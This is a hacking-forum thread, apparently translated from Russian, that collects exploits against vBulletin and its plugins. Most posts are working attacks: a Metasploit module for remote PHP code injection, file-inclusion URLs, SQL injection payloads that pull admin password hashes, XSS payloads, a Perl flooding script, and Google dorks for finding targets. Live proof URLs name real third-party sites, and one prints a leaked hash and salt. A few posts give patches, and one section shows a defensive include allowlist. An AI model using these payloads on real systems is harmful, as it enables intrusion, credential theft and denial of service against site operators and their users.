
vBulletin vulnerabilities

Thread in the "Vulnerabilities of popular CMSs" section, started by rijy, 29 Aug 2006.

  1. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBulletin 4.1.7 Beta 1 Remote File Inclusion

    Code:
    ====================================================
    vBulletin® Version 4.1.7 Beta 1 Multi Vulnerability 
    ====================================================
    
    #######################################################
    
               # Vendor: noLogging by SCRiPTZSECTOR.ORG 
    
                     # Date: 2011-07-27 
    
                    # Author : indoushka 
    
                +++=[ Dz Offenders Cr3w ]=+++
    
             # KedAns-Dz * Caddy-Dz * Kalashinkov3
     
          # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 
    
               # Contact : ind0ushka@hotmail.com
    
         # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
    
    ########################################################################  
    # Exploit By indoushka

    Powered by vBulletin® Version 4.1.7 Beta 1

    [+] RFI:
    Code:
    Function      File                         Line  Exploit
    include       api.php                      139   http://localhost/vB1/api.php?api_script=[EV!L]
    require_once  payment_gateway.php          3     http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]
    include_once  cronadmin.php                4     http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L]
    include       diagnostic.php               12    http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L]
    require_once  diagnostic.php               18    http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]
    include_once  plugin.php                   22    http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]
    include_once  class_block.php              14    http://localhost/vB1/includes/class_block.php?file=[EV!L]
    require_once  class_humanverify.php        2     http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]
    require_once  class_paid_subscription.php  24    http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]
    require_once  functions.php                6     http://localhost/vB1/includes/functions.php?classfile=[EV!L]
    include_once  functions_cron.php           8     http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L]
    require       vb.php                       7     http://localhost/vB1/vb/vb.php?filename=[EV!L]
    require_once  class_upgrade.php            48    http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]
    include_once  attach.php                   80    http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L]
    include_once  attach.php                   604   http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]
    include_once  attach.php                   1222  http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]


    Directory Listing ckeditor :

    http://localhost/vB1/clientscript/ckeditor/
     
    Last edited: 30 Nov 2011
    30 Nov 2011
  2. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBulletin 4.1.10 Full Path Disclosure

    [Info]

    Code:
    # Author: linc0ln.dll
    # Exploit Title: vBulletin 4.1.10 Full Path Disclosure
    # Date: 16/01/2012
    # Vendor or Software Link: http://www.vbulletin.com/
    # Category: WebApp
    # Version: 4.1.10
    # Contact: linc@tormail.net
    # Website: linc6.wordpress.com
    # Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |
    VoltroN | amiugly | b00y4k4 |
    [Vulnerability]

    # Full Path Disclosure:

    Code:
    http://localhost/path/forumdisplay.php?do[]=linc0ln.dll
    http://localhost/path/calendar.php?do[]=linc0ln.dll
    http://localhost/path/search.php?do[]=linc0ln.dll
    # Demo:

    Code:
    http://www.ezoforum.pl/search.php?do[]=linc0ln.dll
    http://www.eprog.pl/search.php?do[]=linc0ln.dll
    http://www.englishsabla.com/forum/search.php?do[]=linc0ln.dll
    (c) linc0ln.pl
     
    Last edited: 22 Jan 2012
    22 Jan 2012
  3. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit


    Code:
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::Remote::HttpClient
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
                'Description'    => %q{
                        This module exploits a vulnerability in the 'proc_deutf()' function
                    defined in /includes/functions_vbseocp_abstract.php. User input passed through
                    'char_repl' POST parameter isn't properly sanitized before being used in a call
                    to preg_replace() function which uses the 'e' modifier. This can be exploited to
                    inject and execute arbitrary code leveraging the PHP's complex curly syntax.
                },
                'Author'         => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision$',
                'References'     =>
                    [
                        ['BID', '51647'],
                        ['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],
                    ],
                'Privileged'     => false,
                'Payload'        =>
                    {
                        'DisableNops' => true,
                        'Space'       => 8190,
                        'Keys'        => ['php'],
                    },
                'Platform'       => ['php'],
                'Arch'           => ARCH_PHP,
                'Targets'        => [[ 'Automatic', { }]],
                'DisclosureDate' => 'Jan 23 2012',
                'DefaultTarget'  => 0))
                register_options(
                    [
                        OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
                    ], self.class)
        end
        def check
            flag = rand_text_alpha(rand(10)+10)
            data = "char_repl='{${print(#{flag})}}'=>"
            uri = ''
            uri << datastore['URI']
            uri << '/' if uri[-1,1] != '/'
            uri << 'vbseocp.php'
            response = send_request_cgi({
                'method' => "POST",
                'uri' => uri,
                'data' => "#{data}"
            })
            if response.code == 200 and response.body =~ /#{flag}/
                return Exploit::CheckCode::Vulnerable
            end
            return Exploit::CheckCode::Safe
        end
        def exploit
            if datastore['CMD']
                p = "passthru(\"%s\");" % datastore['CMD']
                p = Rex::Text.encode_base64(p)
            else
                p = Rex::Text.encode_base64(payload.encoded)
            end
            data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
            uri = ''
            uri << datastore['URI']
            uri << '/' if uri[-1,1] != '/'
            uri << 'vbseocp.php'
            response = send_request_cgi({
                'method' => 'POST',
                'uri' => uri,
                'data' => data,
                'headers' => { 'Code' => p }
            })
            print_status("%s" % response.body) if datastore['CMD']
        end
    end
    
    (с) exploit-db


    vBadvanced CMPS 3.2.2 Local File Inclusion / Remote File Inclusion


    Code:
    # Exploit Title: vBadvanced CMPS <= v3.2.2 [RFI/LFI]
    # Date: 25.01.2012
    # Author: PacketiK email: packeto[dog]mail[dot]ru icq: 555555555 and Ulitochka =P
    # Software Link: http://www.vbadvanced.com/
    # Version: v3.2.2
    # Dependency:
    register_globals = on

    file: vba_cmps_include_bottom.php vuln_code:
    // Process PHP file pages here to avoid having to globalize variables

    Code:
    if ($pages['type'] == 'php_file' AND $vba_cusmodid)
    {
    ob_start();
    require($pages['template']);
    $home[$vba_cusmodid]['content'] = ob_get_contents();
    ob_end_clean();
    }
    Mini_exploits:
    need: allow_url_include = On

    POST:
    Code:
    http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=php://input HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38
    Code:
    <?php phpinfo();ob_end_flush();exit;?>
    Or:

    Code:
    http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=
    Or:

    Code:
    http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt
     
    Last edited: 27 Jan 2012
    27 Jan 2012
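
The include findings in the posts above (request values reaching `include`/`require`, and the vBadvanced `require($pages['template'])` snippet) share one mitigation, shown here as an added example that is not vBulletin or vBadvanced code. The function names `resolve_template` and `render_module`, the directory layout and the template names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Map a requested template name to a file that is safe to require.
 * Returns the absolute path, or null when the request must be refused.
 * (resolve_template and render_module are hypothetical names.)
 */
function resolve_template(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. The request only selects an entry from a fixed list.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: a plain file name only. This refuses stream
    //    wrappers (scheme://), data: URIs and directory traversal even if
    //    the allowlist is later filled from a less trusted source.
    if (preg_match('/\A[a-z0-9_]+\.php\z/', $requested) !== 1) {
        return null;
    }
    // 3. Resolve symlinks and confirm the file lives under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Same job as the require() in the snippet above, with the template
 * validated first. $page must come from the application's own storage,
 * never from request variables.
 */
function render_module(array $page, string $baseDir, array $allowed): ?string
{
    if (($page['type'] ?? '') !== 'php_file') {
        return null;
    }
    $template = $page['template'] ?? '';
    if (!is_string($template)) {   // e.g. an array injected via the request
        return null;
    }
    $path = resolve_template($template, $baseDir, $allowed);
    if ($path === null) {
        return null;
    }
    ob_start();
    require $path;
    return (string) ob_get_clean();
}

// ---- demonstration with constructed data ----
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir, 0700);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . 'news.php', "<?php echo 'news module';");
$allowed = ['news.php'];

// Constructed inputs: one legitimate name, then the value shapes that an
// unchecked require() would have accepted.
$samples = [
    'news.php',
    '../news.php',
    'php://input',
    'data:;base64,AAAA',
    'ftp://files.example.invalid/page.txt',
    'other.php',
];
foreach ($samples as $template) {
    $out = render_module(['type' => 'php_file', 'template' => $template], $dir, $allowed);
    printf("%-40s %s\n", $template, $out === null ? 'refused' : "rendered: $out");
}

unlink($dir . DIRECTORY_SEPARATOR . 'news.php');
rmdir($dir);
```

Independently of this check, an include file should refuse to run when requested directly, and `register_globals` and `allow_url_include` should be off so request variables cannot seed `$pages` or reach remote wrappers.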
  4. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBShout persistent XSS 0day


    Code:
    # Exploit Title: vBShout persistent XSS 0day
    # Google Dork: "DragonByte Technologies Ltd" vbshout
    # Date: 21/3/2012 9:00 PM #EST
    # Author: ToiL
    # Software Link: http://www.dragonbyte-tech.com/
    # Version: all
    # Tested on: all
    # CVE : XSS
    #Greeting from Team Odyessy.
    #Today we will release a 0day for the vBulletin mod, vBShout.
    #This 0day exploit is brought to you by www.Bugabuse.net/
    #Have fun, And happy exploiting.
    ######Guide########
    Enter
    <script>top.location='https://www.bugabuse.net/';</script>
    into the shoutbox
    go into the archive.
    Voila. Persistent XSS exploit.
    Modify to your liking.
     
    Last edited: 31 Mar 2012
    22 Mar 2012
  5. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBshop Persistent XSS


    Code:
    # Exploit Title: vBshop persistent XSS 0day
    # Google Dork: "DragonByte Technologies Ltd" vbshout
    # Date: 25/3/2012 9:32 PM #EST
    # Author: ToiL
    # Software Link: http://www.dragonbyte-tech.com/
    # Version: all
    # Tested on: all
    # CVE : XSS
    
    #Greeting from Team Odyessy.
    #Today we will release a 0day for the vBulletin mod, vBShout.
    #This 0day exploit is brought to you by www.Bugabuse.net/
    #Have fun, And happy exploiting.
    
    ######Guide########
    
    
    Go to vBshop
    Gift an item to another user.
    In the 'message to user' put:
    <script>top.location='https://www.bugabuse.net/';</script>
    Send the item off.
    Go to the users profile that you gifted
    Boom. Pers. XSS.
    Edit to your liking.
    Source: bugsearch.net
     
    31 Mar 2012
  6. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBulletin 4.1.10 Sql Injection Vulnerability


    Code:
    #
    # Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerability
    #
    # Author : IrIsT.Ir
    #
    # Discovered By : Am!r
    #
    # Home : http://IrIsT.Ir
    #
    # Software Link : http://vbulletin.com
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : "Powered By Vbulletin"
    #
    Expl0iTs :
    Code:
    http://vbulletin.com/announcement.php?a=&announcementid=[Sql]
    securityhome
     
    6 Apr 2012
  7. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBulletin 3.X/4.X CSRF IMG-Tag Exploit

    Description and fix by P4INW4R

    Code:
    ===============================================================
    vBulletin 3.X/4.X CSRF IMG-Tag Exploit
    ===============================================================
     
     
    # Exploit Title: vBulletin 3.X/4.X CSRF IMG-Tag Exploit
    # Date: 28/04/2011                          
    # Author: Cyber Tjak                    
    # Software Link: http://www.vBulletin.org
    # Version: 3.X & 4.X
    # Google Dork 1: Powered by vBulletin 3.X
    # Google Dork 2: Powered by vBulletin 4.X
    # Platform / Tested on: Multiple
    # Category: Webapplications
    # Code : N/A
     
    #  BUG :  ######################################################################
     
    1 > Go to something where you want to include it e.g. /profile.php?do=editsignature
    The IMG-Tag must be allowed there.
     
    2 > Post a new post with this content ===> [IMG]
     
    3 > You can use it with a plugin like iTrader http://[localhost]/board/itrader_fee...RID&parseurl=1
    Furthermore you can use it with external scripts like an ip-logging script.
    Just like a normal CSRF-Vuln. =)
     
    4 > Now you see that your script is working.
     
     
    #  FIX by P4INW4R :  ###########################################################
     
    You must create a whitelist for trustworthy imagehosters.
     
    1 > Open ./includes/class_bbcode.php
     
    2 > Search for:
     
            function handle_bbcode_img_match($link)
            {
                    $link = $this->strip_smilies(str_replace('\\"', '"', $link));
     
                    // remove double spaces -- fixes issues with wordwrap
                    $link = str_replace(array('  ', '"'), '', $link);
     
                    return '<img src="' .  $link . '" border="0" alt="" />';
            }
     
    3 > Replace with:
     
            function handle_bbcode_img_match($link)
            {
                    $link = $this->strip_smilies(str_replace('\\"', '"', $link));
                   
                    // remove double spaces -- fixes issues with wordwrap
                    $link = str_replace(array('  ', '"'), '', $link);
     
                    //CSRF FIX
                    $whitelist = array("HERE YOUR IMAGEHOSTER WITHOUT HTTP:// e.g. abload.de");
                   
                    $host = parse_url($link, PHP_URL_HOST);
                    if(substr($host, 0, 4) == "www.")
                    {
                    $host = substr($host, 4); // strip only the leading "www."
                    }
           
                    if (in_array($host, $whitelist)) {
                    return '<img src="' .  $link . '" border="0" alt="" />';
                    }
                    else
                    {
                    return '<p style="color: red;">Please upload your picture at a trusted hoster. For example abload.de</p>';
                    }              
            }
     
    We know that this fix-method is suboptimal so we must wait for a better fix by vBulletin.
     
     
    ################################################################################
     
    Our Website: http://www.echel0n.net
     
    Special Thanks to: P4INW4R, Subnet, Skittles, 0x00, Santa & all other mates.
     
    ################################################################################
    and with "our" image-upload services :)
    Code:
    /**
    	* Handles a match of the  tag that will be displayed as an actual image.
    	*
    	* @param	string	The URL to the image.
    	*
    	* @return	string	HTML representation of the tag.
    	*/
        function handle_bbcode_img_match($link)
    	{
    		$link = $this->strip_smilies(str_replace('\\"', '"', $link));
    
    		// remove double spaces -- fixes issues with wordwrap
    		$link = str_replace(array('  ', '"'), '', $link);
    
    		$whitelist = array(
    		"xaker.name",
    		"grabberz.com",
    		"google.com",
    		"google.ru",
    		"yandex.ru",
    		"savepic.net",
    		"savepic.ru",
    		"hostingkartinok.com",
    		"imglink.ru",
    		"imageshost.ru",
    		"pixshock.net",
    		"radikal.ru",
    		"saveimg.ru",
    		"ipicture.ru",
    		"jpg1.ru",
    		"imagepost.ru",
    		"jpeghost.ru",
    		"impic.ru",
    		"fastpic.ru",
    		"imgex.com",
    		"pictureshack.ru",
    		"keep4u.ru",
    		"myphotoalbum.ru",
    		"4put.ru",
    		"xmages.net",
    		"lostpic.net");
    
    		$host = parse_url($link, PHP_URL_HOST);
    		if(substr($host, 0, 4) == "www.")
    		{
    		$host = substr($host, 4); // strip only the leading "www."
    		}
    
    		if (in_array($host, $whitelist)) {
    		return '<img src="' .  $link . '" border="0" alt="" />';
    		}
    		else
    		{
    		return '<p style="color: red;">Please upload your picture at a trusted hoster. For: savepic.net, radikal.ru, ipicture.ru, fastpic.ru, etc</p>';
    		}
    	}
    You can also add your own domain if hacks like "Img hosting" are installed; otherwise inserting images into posts/signatures will be impossible :)
     
    Last edited: 22 Jun 2012
    20 May 2012
  8. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    vBulletin 4.2.0 XSS Vulnerability

    Code:
    $------------------------------------------------------------------------------------------------------------
    $ vBulletin 4.2.0 XSS Vulnerability 
    $ Author : sangteamtham 
    $ Home : Hcegroup.vn 
    $ Download: http://members.vbulletin.com/ 
    $ Date :06/13/2012 
    $ Google Dork: "Powered by vBulletin® Version 4.2.0"
    $ Twitter: http://twitter.com/Sangte_amtham
    $************************************************************************************************************* 
    1.vBulletin Description:
    
     Content publishing, search, security, and more— vBulletin has it all. 
     Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money. 
     Learn more about what makes vBulletin the choice for people who are serious about creating 
     thriving online communities.
    
    2. Vulnerability Description:
    
    To steal cookie from administrator or any member in a forum or drive them to malicious sites, attacker will firstly create an account, then come to 
    calendar section, and create an event for himself. 
    
    In title, he will inject XSS code there. For sample:
    
    "><img src=x onerror=alert(1)> 
    
    In content section, he will write everything he likes. Now, he will send his profile to Administrator or any member
    and wait for cookie or victims' infection.
    
    http://127.0.0.1/vbb/member.php?id-xyz
    
    3. Patch:
    
    June 13, 2012: Contacted the vendor. 
    June 14, 2012: Vendor replied me.
    June 18, 2012: the vendor released the patch for this vulnerability. Please download it from member Area right now.
    
    https://members.vbulletin.com/patches.php
    
    (c) Hcegroup.vn ​

    [FIX] XSS Exploit - vBulletin 4.2.0

    open
    Code:
    /vb/activitystream/view/perm/calendar/event.php
    Code:
        public function fetchTemplate($templatename, $activity)
        {
            $eventinfo =& $this->content['event'][$activity['contentid']];
            $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];
    
            $activity['postdate'] = vbdate(vB::$vbulletin->options['dateformat'], $activity['dateline'], true);
            $activity['posttime'] = vbdate(vB::$vbulletin->options['timeformat'], $activity['dateline']);
    
            $preview = strip_quotes($eventinfo['event']);
            $eventinfo['preview'] = htmlspecialchars_uni(fetch_censored_text(
                fetch_trimmed_title(strip_bbcode($preview, false, true, true, true),
                    vb::$vbulletin->options['as_snippet'])
            ));
    
            $templater = vB_Template::create($templatename);
                $templater->register('userinfo', $this->content['user'][$activity['userid']]);
                $templater->register('activity', $activity);
                $templater->register('eventinfo', $eventinfo);
                $templater->register('calendarinfo', $calendarinfo);
            return $templater->render();
        }
    after

    Code:
    $activity['posttime']
    add

    Code:
    $eventinfo['title'] = htmlspecialchars_uni($eventinfo['title']);
    Code:
        public function fetchTemplate($templatename, $activity)
        {
            $eventinfo =& $this->content['event'][$activity['contentid']];
            $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];
    
            $activity['postdate'] = vbdate(vB::$vbulletin->options['dateformat'], $activity['dateline'], true);
            $activity['posttime'] = vbdate(vB::$vbulletin->options['timeformat'], $activity['dateline']);
            $eventinfo['title'] = htmlspecialchars_uni($eventinfo['title']);
    
            $preview = strip_quotes($eventinfo['event']);
            $eventinfo['preview'] = htmlspecialchars_uni(fetch_censored_text(
                fetch_trimmed_title(strip_bbcode($preview, false, true, true, true),
                    vb::$vbulletin->options['as_snippet'])
            ));
    
            $templater = vB_Template::create($templatename);
                $templater->register('userinfo', $this->content['user'][$activity['userid']]);
                $templater->register('activity', $activity);
                $templater->register('eventinfo', $eventinfo);
                $templater->register('calendarinfo', $calendarinfo);
            return $templater->render();
        }
    _http://unstuck.fr/showthread.php/396-FIX-XSS-Exploit-vBulletin-4-2-0?p=413
     
    22 Jun 2012
  9. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    Bug in the Arcade hack

    [0-Day] ibPro Arcade vBulletin Exploit

    Code:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=[SQLi]
    Fetch the password & salt of user ID 1:

    Code:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,salt) FROM user WHERE id = 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    proof:
    Code:
    http://www.nohomers.net/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(password,0x3a,salt)%20FROM%20user%20WHERE%20id%20=%201),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
    Code:
    mySQL error: Duplicate entry '7a4d3244d834397e38b65ef817e62cb4:Q:v)r!oe@KuF:L5@aA91^qyiaTOsC%1' for key 'group_key'
    https://www.google.ru/search?sugexp...q=/arcade.php?act=Arcade+Powered+by+vBulletin
    Results: about 233,000

    (c) p0wersurge.com
     
    Last edited: 2 Jul 2012
    2 Jul 2012
  10. Хулиган
    Хулиган, Forum team, Advanced
    Likes: 246
    Code:
    [+] vBulletin all 3 vBulletin full path disclosure Vulnerability
    [-] Found by Angel Injection
    [-] Version: all 3
    [-] Security -::RISK: Just For Information So "Low"
    [-] platforms: php
    [-] http://1337day.com http://r00tw0rm.com http://i313.cc
    
    [+] Thanx To "Mhd1"

    Exploit work on

    http://localhost/search.php?do[]=1337

    http://localhost/profile.php?do[]=1337

    http://localhost/subscription.php?do[]=1337

    Online Test

    http://www.vbhacker.net/vb/search.php?do[]=i313.cc/313 And 1337day.com

    http://www.vbhacker.net/vb/profile.php?do[]=i313.cc/313 And 1337day.com

    http://www.vbhacker.net/vb/subscription.php?do[]=i313.cc/313 And 1337day.com

    P.S. vBulletin all 3: no idea why it says all versions, it definitely does not work on XN :)
    You can get rid of the "bug", if it can even be called that, for example like this:
    http://0x0000ed.com/#!/post/4
     
    Last edited: 5 Jul 2012
    4 Jul 2012
  11. p0wER
    p0wER, Newbie
    Likes: 41
    Inferno vBShout SQLI 0day <= 2.5.2
    Code:
    ====================================================================
    #               Inferno vBShout SQLI 0day <= 2.5.2                 #
    ====================================================================
    # Found by: Luit
    # Site: http://grifter.org
    # E-Mail: luit@usa.com
    # Date: 14/08/2012
     
    ====================================================================
    #    Vulnerable Code - infernoshout.php & inferno_settings.php     #
    ====================================================================
    $commands = unserialize($this->settings['s_commands']);
     
    if ($this->vbulletin->db->affected_rows() < 1 && !$this->vbulletin->db->query_first("select * from " . TABLE_PREFIX . "infernoshoutusers where s_user='{$this->vbulletin->userinfo['userid']}'"))
            {
                $this->vbulletin->db->query("
                    insert into " . TABLE_PREFIX . "infernoshoutusers
                    (s_user, s_commands)
                    values
                    ({$this->vbulletin->userinfo['userid']}, '" . serialize($commands) . "')
                ");
            }
             
    ====================================================================
    #                           Exploit Location                       #
    ====================================================================
    # Location: http://site.com/infernoshout.php?do=options&area=commands
     
    ====================================================================
    #                           SQL Injection                          #
    ====================================================================
    ' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
     
    ====================================================================
    #                           How to use                             #
    ====================================================================
     
    Insert SQL injection into the first "Command Input" box and enter anything into the first "Command Output" box, hit save settings, you will be treated with a database error, view the page source and scroll to the bottom of the page, you will see some quoted text containing the data you want.
    ====================================================================
    #                           Video Tutorial                         #
    ====================================================================
    http://www.youtube.com/watch?v=g70_JaKnBbw
     
    
    A real summer of vBulletin vulnerabilities.
     
    18 Aug 2012
  12. nem1s
    nem1s, rm -rf /*, Advanced
    Likes: 53
    vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day

    Information:

    Code:
    Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
    Google Dork: inurl:awards.php intext:"powered by vbulletin"
    Date: 29/08/12
    Exploit Author: Backsl@sh/Dan
    Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
    Version: 4.0.2+
    Vuln. code:

    PHP:
    $vbulletin->input->clean_array_gpc('p', array(
        'award_id' => TYPE_UINT,
        //'award_request_name' => TYPE_STR,
        //'award_request_recipient_name' => TYPE_STR,
        'award_request_reason' => TYPE_STR,
        'award_request_uid' => TYPE_UNIT, // sic: TYPE_UNIT, not TYPE_UINT
    ));

    $award_request_uid = $vbulletin->GPC['award_request_uid'];

    $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '" . $db->escape_string($vbulletin->GPC['award_request_reason']) . "')");

    $award_request_uid is used within an insert into statement unsanitized.
    POC:

    Code:
    http://[site].com/request_award.php
    POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
     
    31 Aug 2012
  13. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    Exploit Title : Vbulletin v4.1.12 Sql php command execute Vulnerability

    Code:
    Exploit Title : Vbulletin v4.1.12 Sql php command execute Vulnerability
    Author : IrIsT.Ir
    
    Discovered By : Am!r
    
    Home : http://IrIsT.Ir/forum
    
    Software Link : http://www.Vbulletin.com/
    
    Security Risk : High
    
    Version : All Version
    
    Tested on : GNU/Linux Ubuntu - Windows Server - win7
    Dork : intext:"Powered By Vbulletin 4.1.12"
    Exploit:
    Code:
    http://target.com/search.php?do=process&flood_result=[PCE]
    source bugsearch.net
     
    1 Sep 2012
  14. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    Yet Another Usergroup Legend (AJAX)

    Code:
    Home: xaker.name & grabberz.com
    Thread with the hack: http://www.vbulletin.org/forum/showthread.php?t=181956, http://vbsupport.org/forum/showthread.php?t=26774

    Code:
    ajax.php?do=getgroup&groupis=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(103),CHAR(102),CHAR(81),CHAR(73),CHAR(71),CHAR(85),CHAR(90),CHAR(112)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
    proof:
    Code:
    http://sea-wave.ru/forum/ajax.php?do=getgroup&groupis=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(103),CHAR(102),CHAR(81),CHAR(73),CHAR(71),CHAR(85),CHAR(90),CHAR(112)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
    Thanks to кативо for the help and the nudge in the right direction ;)
    The fixed version is in the attachment.
    View attachment product-yaugl_mdm_cp1251.zip
     
    Last edited: 4 Oct 2012
    10 Sep 2012
  15. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    Vbulletin 4.1.* Remote Denial of Service


    Code:
    #!/usr/bin/perl
    # Vbulletin 4.1.* Remote Denial of Service
    # Version: 4.0.11
    # Home : http://Www.IrIsT.Ir/forum
    # Security : High
    
    
    use IO::Socket;
    print "###########################################################################\n";
    print "# #\n";
    print "# Islamic Republic Of Iran Security Team - Vbulletin DDOSer #\n";
    print "# Home : Www.IrIsT.Ir & Www.IrIsT.Ir/forum #\n";
    print "# #\n";
    print "###########################################################################\n";
    print "Vbulletin DDOSer\n";
    print "Site : ";
    $HOST = <STDIN>; 
    chop ($HOST); 
    
    $i=0;
    while($i<500000){
    $i++;
    
    $lower=1; 
    $upper=200000; 
    $random = int(rand( $upper-$lower+1 ) ) + $lower; 
    $FILE = "1111111111111111111111111111111111111111111111111111111111111111111111111111";
    $LENGTH = length $FILE;
    
    $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "*";
    print $get1 "POST /image.php?type= HTTP/1.1\n";
    print $get1 "Host: ".$HOST. "\n";
    print $get1 $FILE;
    syswrite STDOUT, "*";
    } 
    # Greetz : TBH - Security7.Ir - GreyH4t.Com - Datacoders.org - Shabgard.Org & All IrIsT.Ir & Iranian Security Team
    Vbulletin 4.1.10 (functions_cron.php) Local file Include Vulnerabilities


    Code:
    ########################################################
    #
    # Exploit Title : Vbulletin 4.1.10 (functions_cron.php) Local file Include Vulnerabilities
    #
    # Author : #BHG Security Center - IrIsT Security Team
    #
    # Discovered By : Am!r
    #
    # Home : http://Black-hg.Org - http://IrIsT.Ir
    #
    # Software Link : http://vbulletin.com
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : "Powered by Vbulletin 4.1.10"
    #
    ########################################################
    Expl0iT :

    Code:
    [TarGeT]/Patch/includes/functions_cron.php?nextitem=[Lfi]
     
    11 Sep 2012
  16. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability


    • Author : IrIsT.Ir
    • Discovered By : Am!r
    • Home : http://IrIsT.Ir/forum
    • Software Link : http://www.Vbulletin.com/
    • Security Risk : High
    • Version : All Version
    • Tested on : GNU/Linux Ubuntu - Windows Server - win7
    • Dork : intext:"Powered By Vbulletin 4.1.12"

    Expl0iTs :
    Code:
    http://target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]
     
    21 Sep 2012
  17. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability


    Code:
    # Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability
    # Google Dork: No Dork
    # Date: 19/10/2012
    # Exploit Author: Juno_okyo
    # Vendor Homepage: http://hoiquantinhoc.com
    # Software Link:
